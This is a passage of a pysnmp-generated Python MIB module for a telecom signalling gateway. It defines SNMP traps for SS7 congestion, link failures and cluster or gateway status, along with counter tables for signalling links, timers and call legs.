ss7DestinationCongestedClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3101)).setObjects(("InternetThruway-MIB", "destCongestIndex"), ("InternetThruway-MIB", "destCongestKey"), ("InternetThruway-MIB", "destCongestIPAddress"), ("InternetThruway-MIB", "destCongestName"), ("InternetThruway-MIB", "destCongestPointcode"), ("InternetThruway-MIB", "destCongestCongestionLevel"), ("InternetThruway-MIB", "destCongestTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationCongestedClear.setDescription('Trap generated to indicate that there is no longer congestion at an SS7 destination.')
ss7LinkAlignmentFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3114)).setObjects(("InternetThruway-MIB", "linkAlignIndex"), ("InternetThruway-MIB", "linkAlignKey"), ("InternetThruway-MIB", "linkAlignIPAddress"), ("InternetThruway-MIB", "linkAlignName"), ("InternetThruway-MIB", "linkAlignLinkCode"), ("InternetThruway-MIB", "linkAlignCardId"), ("InternetThruway-MIB", "linkAlignLinkSet"), ("InternetThruway-MIB", "linkAlignTimeStamp"))
if mibBuilder.loadTexts: ss7LinkAlignmentFailureAlarm.setDescription('Trap generated to indicate alignment failure on a datalink.')
ss7LinkAlignmentFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3111)).setObjects(("InternetThruway-MIB", "linkAlignIndex"), ("InternetThruway-MIB", "linkAlignKey"), ("InternetThruway-MIB", "linkAlignIPAddress"), ("InternetThruway-MIB", "linkAlignName"), ("InternetThruway-MIB", "linkAlignLinkCode"), ("InternetThruway-MIB", "linkAlignCardId"), ("InternetThruway-MIB", "linkAlignLinkSet"), ("InternetThruway-MIB", "linkAlignTimeStamp"))
if mibBuilder.loadTexts: ss7LinkAlignmentFailureClear.setDescription('Trap generated to clear a datalink alignment failure alarm.')
ncLostServerTrap = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4014)).setObjects(("InternetThruway-MIB", "lsIndex"), ("InternetThruway-MIB", "lsKey"), ("InternetThruway-MIB", "lsName"), ("InternetThruway-MIB", "lsIPAddress"), ("InternetThruway-MIB", "lsTimeStamp"))
if mibBuilder.loadTexts: ncLostServerTrap.setDescription('This trap is generated when the CSG loses contact with its peer in the cluster. The variables in this trap identify the server that has been lost. The originator of this trap is implicitly defined.')
ncFoundServerTrap = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4011)).setObjects(("InternetThruway-MIB", "lsIndex"), ("InternetThruway-MIB", "lsKey"), ("InternetThruway-MIB", "lsName"), ("InternetThruway-MIB", "lsIPAddress"), ("InternetThruway-MIB", "lsTimeStamp"))
if mibBuilder.loadTexts: ncFoundServerTrap.setDescription('This trap is generated when the CSG initially comes into contact with, or regains contact with, its peer in the cluster. The variables in this trap identify the server that has been found. The originator of this trap is implicitly defined.')
ncStateChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4022)).setObjects(("InternetThruway-MIB", "ncEthernetName"), ("InternetThruway-MIB", "ncEthernetIP"), ("InternetThruway-MIB", "ncOperationalState"), ("InternetThruway-MIB", "ncStandbyState"), ("InternetThruway-MIB", "ncAvailabilityState"))
if mibBuilder.loadTexts: ncStateChangeTrap.setDescription('This trap is generated when any of the state values change.')
csgComplexStateTrapClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4031)).setObjects(("InternetThruway-MIB", "cplxName"), ("InternetThruway-MIB", "cplxLocEthernetName"), ("InternetThruway-MIB", "cplxLocEthernetIP"), ("InternetThruway-MIB", "cplxLocOperationalState"), ("InternetThruway-MIB", "cplxLocStandbyState"), ("InternetThruway-MIB", "cplxLocAvailabilityState"), ("InternetThruway-MIB", "cplxMateEthernetName"), ("InternetThruway-MIB", "cplxMateEthernetIP"), ("InternetThruway-MIB", "cplxMateOperationalState"), ("InternetThruway-MIB", "cplxMateStandbyState"), ("InternetThruway-MIB", "cplxMateAvailabilityState"), ("InternetThruway-MIB", "cplxAlarmStatus"))
if mibBuilder.loadTexts: csgComplexStateTrapClear.setDescription('This trap is generated when any of the state values change. Severity is determined only by the operational and standby states of both servers.')
csgComplexStateTrapMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4034)).setObjects(("InternetThruway-MIB", "cplxName"), ("InternetThruway-MIB", "cplxLocEthernetName"), ("InternetThruway-MIB", "cplxLocEthernetIP"), ("InternetThruway-MIB", "cplxLocOperationalState"), ("InternetThruway-MIB", "cplxLocStandbyState"), ("InternetThruway-MIB", "cplxLocAvailabilityState"), ("InternetThruway-MIB", "cplxMateEthernetName"), ("InternetThruway-MIB", "cplxMateEthernetIP"), ("InternetThruway-MIB", "cplxMateOperationalState"), ("InternetThruway-MIB", "cplxMateStandbyState"), ("InternetThruway-MIB", "cplxMateAvailabilityState"), ("InternetThruway-MIB", "cplxAlarmStatus"))
if mibBuilder.loadTexts: csgComplexStateTrapMajor.setDescription('This trap is generated when any of the state values change. Severity is determined only by the operational and standby states of both servers.')
csgComplexStateTrapCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4035)).setObjects(("InternetThruway-MIB", "cplxName"), ("InternetThruway-MIB", "cplxLocEthernetName"), ("InternetThruway-MIB", "cplxLocEthernetIP"), ("InternetThruway-MIB", "cplxLocOperationalState"), ("InternetThruway-MIB", "cplxLocStandbyState"), ("InternetThruway-MIB", "cplxLocAvailabilityState"), ("InternetThruway-MIB", "cplxMateEthernetName"), ("InternetThruway-MIB", "cplxMateEthernetIP"), ("InternetThruway-MIB", "cplxMateOperationalState"), ("InternetThruway-MIB", "cplxMateStandbyState"), ("InternetThruway-MIB", "cplxMateAvailabilityState"), ("InternetThruway-MIB", "cplxAlarmStatus"))
if mibBuilder.loadTexts: csgComplexStateTrapCritical.setDescription('This trap is generated when any of the state values change. Severity is determined only by the operational and standby states of both servers.')
cisRetrievalFailureTrapMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4044))
if mibBuilder.loadTexts: cisRetrievalFailureTrapMajor.setDescription('This trap is generated when TruCluster ASE information retrieval attempts have failed repeatedly.')
genericNormal = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9001)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericNormal.setDescription('The Trap generated for generic normal priority text messages')
genericWarning = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9002)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericWarning.setDescription('The Trap generated for generic warning priority text messages')
genericMinor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9003)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericMinor.setDescription('The Trap generated for generic minor priority text messages')
genericMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9004)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericMajor.setDescription('The Trap generated for generic major priority text messages')
genericCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9005)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericCritical.setDescription('The Trap generated for generic critical priority text messages')
hgStatusClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9011)).setObjects(("InternetThruway-MIB", "hgKey"), ("InternetThruway-MIB", "hgIndex"), ("InternetThruway-MIB", "hgName"), ("InternetThruway-MIB", "hgIPAddress"), ("InternetThruway-MIB", "hgAlarmTimeStamp"))
if mibBuilder.loadTexts: hgStatusClear.setDescription('The Trap generated when a Home Gateway Status returns to normal after having previously been in the failed status.')
hgStatusAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9014)).setObjects(("InternetThruway-MIB", "hgKey"), ("InternetThruway-MIB", "hgIndex"), ("InternetThruway-MIB", "hgName"), ("InternetThruway-MIB", "hgIPAddress"), ("InternetThruway-MIB", "hgAlarmTimeStamp"))
if mibBuilder.loadTexts: hgStatusAlarm.setDescription('The Trap generated when a Home Gateway is indicated to be failed.')
nasStatusClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9021)).setObjects(("InternetThruway-MIB", "nasKey"), ("InternetThruway-MIB", "nasIndex"), ("InternetThruway-MIB", "nasName"), ("InternetThruway-MIB", "nasIPAddress"), ("InternetThruway-MIB", "nasAlarmTimeStamp"), ("InternetThruway-MIB", "nasCmplxName"))
if mibBuilder.loadTexts: nasStatusClear.setDescription('The Trap generated when a NAS registers after having previously been in the failed status.')
nasStatusAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9024)).setObjects(("InternetThruway-MIB", "nasKey"), ("InternetThruway-MIB", "nasIndex"), ("InternetThruway-MIB", "nasName"), ("InternetThruway-MIB", "nasIPAddress"), ("InternetThruway-MIB", "nasAlarmTimeStamp"), ("InternetThruway-MIB", "nasCmplxName"))
if mibBuilder.loadTexts: nasStatusAlarm.setDescription('The Trap generated when a NAS is indicated to be failed.')
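# --- Signalling link OM table ----------------------------------------------------
# Per-link operational measurements (failures, congestion, inhibits, MSU
# counts, remote processor outages), indexed by linksetIndex and linkIndex.
#
# A minimal manager-side sketch of walking one of these columns with the
# pysnmp 4.x high-level API is shown below. It assumes this compiled MIB is
# on the pysnmp MIB search path; 'csg-host' and 'public' are placeholders.
#
# from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
#                           ContextData, ObjectType, ObjectIdentity, nextCmd)
#
# for errorIndication, errorStatus, errorIndex, varBinds in nextCmd(
#         SnmpEngine(), CommunityData('public'),
#         UdpTransportTarget(('csg-host', 161)), ContextData(),
#         ObjectType(ObjectIdentity('InternetThruway-MIB', 'linkFailures')),
#         lexicographicMode=False):
#     if errorIndication or errorStatus:
#         break
#     for varBind in varBinds:
#         print(' = '.join(x.prettyPrint() for x in varBind))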
linkOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1), )
if mibBuilder.loadTexts: linkOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMTable.setDescription('The LinkOMTable contains information about each signaling link on the CSG.')
linkOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "linksetIndex"), (0, "InternetThruway-MIB", "linkIndex"))
if mibBuilder.loadTexts: linkOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMTableEntry.setDescription('An entry in the LinkOMTable. Indexed by linksetIndex and linkIndex.')
linkOMId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkOMId.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMId.setDescription('The id of the link.')
linkOMSetId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkOMSetId.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMSetId.setDescription('The id of the linkset.')
linkFailures = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkFailures.setStatus('mandatory')
if mibBuilder.loadTexts: linkFailures.setDescription('Number of times this signaling link has failed.')
linkCongestions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkCongestions.setStatus('mandatory')
if mibBuilder.loadTexts: linkCongestions.setDescription('Number of times this signaling link has Congested.')
linkInhibits = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkInhibits.setStatus('mandatory')
if mibBuilder.loadTexts: linkInhibits.setDescription('Number of times this signaling link has been inhibited.')
linkTransmittedMSUs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkTransmittedMSUs.setStatus('mandatory')
if mibBuilder.loadTexts: linkTransmittedMSUs.setDescription('Number of messages sent on this signaling link.')
linkReceivedMSUs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkReceivedMSUs.setStatus('mandatory')
if mibBuilder.loadTexts: linkReceivedMSUs.setDescription('Number of messages received on this signaling link.')
linkRemoteProcOutages = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkRemoteProcOutages.setStatus('mandatory')
if mibBuilder.loadTexts: linkRemoteProcOutages.setDescription('Number of times remote processor outages have been reported.')
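# --- Timer expiry counters ---------------------------------------------------------
# Expiry counts for the BLA, RLC, UBA and RSA timers (presumably the ISUP
# supervision timers associated with blocking, release-complete, unblocking
# and reset procedures).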
bLATimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bLATimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: bLATimerExpiries.setDescription('Number of times the BLA timer has expired.')
rLCTimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rLCTimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: rLCTimerExpiries.setDescription('Number of times the RLC timer has expired.')
uBATimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: uBATimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: uBATimerExpiries.setDescription('Number of times the UBA timer has expired.')
rSATimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rSATimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: rSATimerExpiries.setDescription('Number of times the RSA timer has expired.')
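# --- System-wide call-processing OMs -------------------------------------------------
# Attempt, completion and rejection counters for outgoing and incoming call
# legs, plus cumulative and currently-active call counts (digital and analog).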
outCallAttempts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: outCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: outCallAttempts.setDescription('Total number of outgoing call legs attempted.')
outCallNormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: outCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: outCallNormalCompletions.setDescription('Total number of outgoing call legs completed normally.')
outCallAbnormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: outCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: outCallAbnormalCompletions.setDescription('Total number of outgoing call legs completed abnormally.')
userBusyOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userBusyOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userBusyOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to user busy signal.')
tempFailOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tempFailOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: tempFailOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to temporary failure.')
userUnavailableOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userUnavailableOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userUnavailableOutCallRejects.setDescription('Total number of outgoing call legs failed due to user not available.')
abnormalReleaseOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: abnormalReleaseOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: abnormalReleaseOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to abnormal release.')
otherOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: otherOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: otherOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to other reasons.')
cumulativeActiveOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cumulativeActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: cumulativeActiveOutCalls.setDescription('Cumulative number of outgoing call legs active so far.')
currentlyActiveOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveOutCalls.setDescription('Total Number of outgoing call legs currently active.')
currentlyActiveDigitalOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveDigitalOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveDigitalOutCalls.setDescription('Total Number of outgoing digital call legs currently active.')
currentlyActiveAnalogOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveAnalogOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveAnalogOutCalls.setDescription('Total Number of outgoing analog call legs currently active.')
inCallAttempts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: inCallAttempts.setDescription('Total number of incoming call legs attempted.')
inCallNormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: inCallNormalCompletions.setDescription('Total number of incoming call legs completed normally.')
inCallAbnormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: inCallAbnormalCompletions.setDescription('Total number of incoming call legs completed abnormally.')
userBusyInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userBusyInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userBusyInCallRejects.setDescription('Total Number of incoming call legs rejected due to user busy signal.')
tempFailInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tempFailInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: tempFailInCallRejects.setDescription('Total Number of incoming call legs rejected due to temporary failure.')
userUnavailableInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userUnavailableInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userUnavailableInCallRejects.setDescription('Total number of incoming call legs failed due to user not available.')
abnormalReleaseInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: abnormalReleaseInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: abnormalReleaseInCallRejects.setDescription('Total Number of incoming call legs rejected due to abnormal release.')
otherInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: otherInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: otherInCallRejects.setDescription('Total Number of incoming call legs rejected due to other reasons.')
cumulativeActiveInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cumulativeActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: cumulativeActiveInCalls.setDescription('Cumulative number of incoming call legs active so far.')
currentlyActiveInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 22), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveInCalls.setDescription('Total Number of incoming call legs currently active.')
currentlyActiveDigitalInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 23), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveDigitalInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveDigitalInCalls.setDescription('Total Number of incoming digital call legs currently active.')
currentlyActiveAnalogInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 24), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveAnalogInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveAnalogInCalls.setDescription('Total Number of incoming analog call legs currently active.')
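# --- Per-trunk-group call OM table ---------------------------------------------------
# The same call-leg counters broken out per trunk group (identified by its
# CLLI), indexed by trunkCallOMIndex.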
trunkCallOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1), )
if mibBuilder.loadTexts: trunkCallOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCallOMTable.setDescription('The TrunkCallOMTable contains call-related OMs on a per-trunk-group basis.')
trunkCallOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "trunkCallOMIndex"))
if mibBuilder.loadTexts: trunkCallOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCallOMTableEntry.setDescription('An entry in the TrunkCallOMTable. Indexed by trunkCallOMIndex.')
trunkCallOMIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: trunkCallOMIndex.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCallOMIndex.setDescription('Identifies a trunk group index.')
trunkGroupCLLI = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkGroupCLLI.setStatus('mandatory')
if mibBuilder.loadTexts: trunkGroupCLLI.setDescription('The Common Language Location Identifier(CLLI), a unique alphanumeric value to identify this Trunk Group.')
numberOfCircuits = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: numberOfCircuits.setStatus('mandatory')
if mibBuilder.loadTexts: numberOfCircuits.setDescription('Total Number of Circuits provisioned against this trunk group.')
trunkOutCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOutCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOutCallAttempts.setDescription('Total number of outgoing call legs attempted.')
trunkOutCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOutCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOutCallNormalCompletions.setDescription('Total number of outgoing call legs completed normally.')
trunkOutCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOutCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOutCallAbnormalCompletions.setDescription('Total number of outgoing call legs completed abnormally.')
trunkUserBusyOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserBusyOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserBusyOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to user busy signal.')
trunkTempFailOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkTempFailOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkTempFailOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to temporary failure.')
trunkUserUnavailableOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserUnavailableOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserUnavailableOutCallRejects.setDescription('Total number of outgoing call legs failed due to user not available.')
trunkAbnormalReleaseOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkAbnormalReleaseOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkAbnormalReleaseOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to abnormal release.')
trunkOtherOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOtherOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOtherOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to other reasons.')
trunkCumulativeActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCumulativeActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCumulativeActiveOutCalls.setDescription('Cumulative Number of outgoing call legs active so far.')
trunkCurrentlyActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveOutCalls.setDescription('Total Number of outgoing call legs currently active.')
trunkCurrentlyActiveDigitalOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalOutCalls.setDescription('Total Number of outgoing digital call legs currently active.')
trunkCurrentlyActiveAnalogOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogOutCalls.setDescription('Total Number of outgoing analog call legs currently active.')
trunkInCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkInCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: trunkInCallAttempts.setDescription('Total number of incoming call legs attempted.')
trunkInCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkInCallNormalCompletions.setStatus('mandatory')
